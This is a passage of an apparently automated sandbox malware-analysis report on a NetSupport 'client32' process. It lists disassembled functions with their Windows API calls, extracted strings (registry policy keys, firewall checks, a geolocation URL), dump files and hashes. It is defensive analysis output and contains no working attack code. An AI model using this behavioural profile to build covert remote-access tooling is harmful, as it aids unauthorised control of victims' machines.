                                                                              • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                              Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                              • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                              • API String ID: 2061479752-1320826866
                                                                              • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                              • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                              Function 11106E70 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11106E9E
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                              • GetTickCount.KERNEL32 ref: 11106EAD
                                                                              • GetTickCount.KERNEL32 ref: 11106F00
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                              • GetTickCount.KERNEL32 ref: 11106F3A
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                              • API String ID: 1574099134-3013461081
                                                                              • Opcode ID: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                              • Opcode Fuzzy Hash: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                              Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,EE49F673,?,00000000,00000000), ref: 1102D594
                                                                              • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                              • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                              • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                              • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                              • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                              • API String ID: 83693535-1096744297
                                                                              • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                              • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                              Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                              • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                              • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                              • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                              • API String ID: 596640303-1725438197
                                                                              • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                              • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                              Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                              • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Enum$Open$CloseValue
                                                                              • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                              • API String ID: 2823542970-1528906934
                                                                              • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                              • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                              Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetTickCount.KERNEL32 ref: 111385E2
                                                                                • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                              • GetTickCount.KERNEL32 ref: 111385F1
                                                                              • _memset.LIBCMT ref: 11138633
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                              • _strrchr.LIBCMT ref: 11138658
                                                                              • _free.LIBCMT ref: 111386AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                              • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                              • API String ID: 711243594-1270230032
                                                                              • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                              • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                              • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                              Function 6EEF7610 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 111networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ioctlsocket.WSOCK32 ref: 6EEF7642
                                                                              • connect.WSOCK32(00000000,?,?), ref: 6EEF7659
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?), ref: 6EEF7660
                                                                              • _memmove.LIBCMT ref: 6EEF76D3
                                                                              • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6EEF76F3
                                                                              • GetTickCount.KERNEL32 ref: 6EEF7717
                                                                              • ioctlsocket.WSOCK32 ref: 6EEF775C
                                                                              • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6EEF7762
                                                                              • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6EEF777A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6EEF778B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                              • String ID: *BlockingIO$ConnectTimeout$General
                                                                              • API String ID: 4218156244-2969206566
                                                                              • Opcode ID: ba8ff20aac7b407366a5564eff13ae2f12b7409ed9e1bdbaa9b7e1be8a5de9cb
                                                                              • Instruction ID: 55a44fe6cc5493066bf74cba0e9dcd417c3c22184e03997ee493c66f081607e0
                                                                              • Opcode Fuzzy Hash: ba8ff20aac7b407366a5564eff13ae2f12b7409ed9e1bdbaa9b7e1be8a5de9cb
                                                                              • Instruction Fuzzy Hash: 03411A71D24319DBE7209BE4CC58BD973BEAF44308F20449AE90D971C1EB709A5ACBA1
                                                                              Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                              • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                              • LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
                                                                              • GetSystemMetrics.USER32(00000021), ref: 11134DF9
                                                                              • GetSystemMetrics.USER32(0000000F), ref: 11134E01
                                                                              • GetSystemMetrics.USER32(00000004), ref: 11134E07
                                                                              • GetDC.USER32(00000000), ref: 11134E13
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                              • CreateWindowExA.USER32(00000001,NSMWClass,03470F00,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                              • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                              • API String ID: 1594747848-1114959992
                                                                              • Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
                                                                              • Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
                                                                              • Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
                                                                              Function 11133B00 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11133B70
                                                                              • GetTickCount.KERNEL32 ref: 11133BA1
                                                                              • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                              • GetTickCount.KERNEL32 ref: 11133BBC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$FolderPathwsprintf
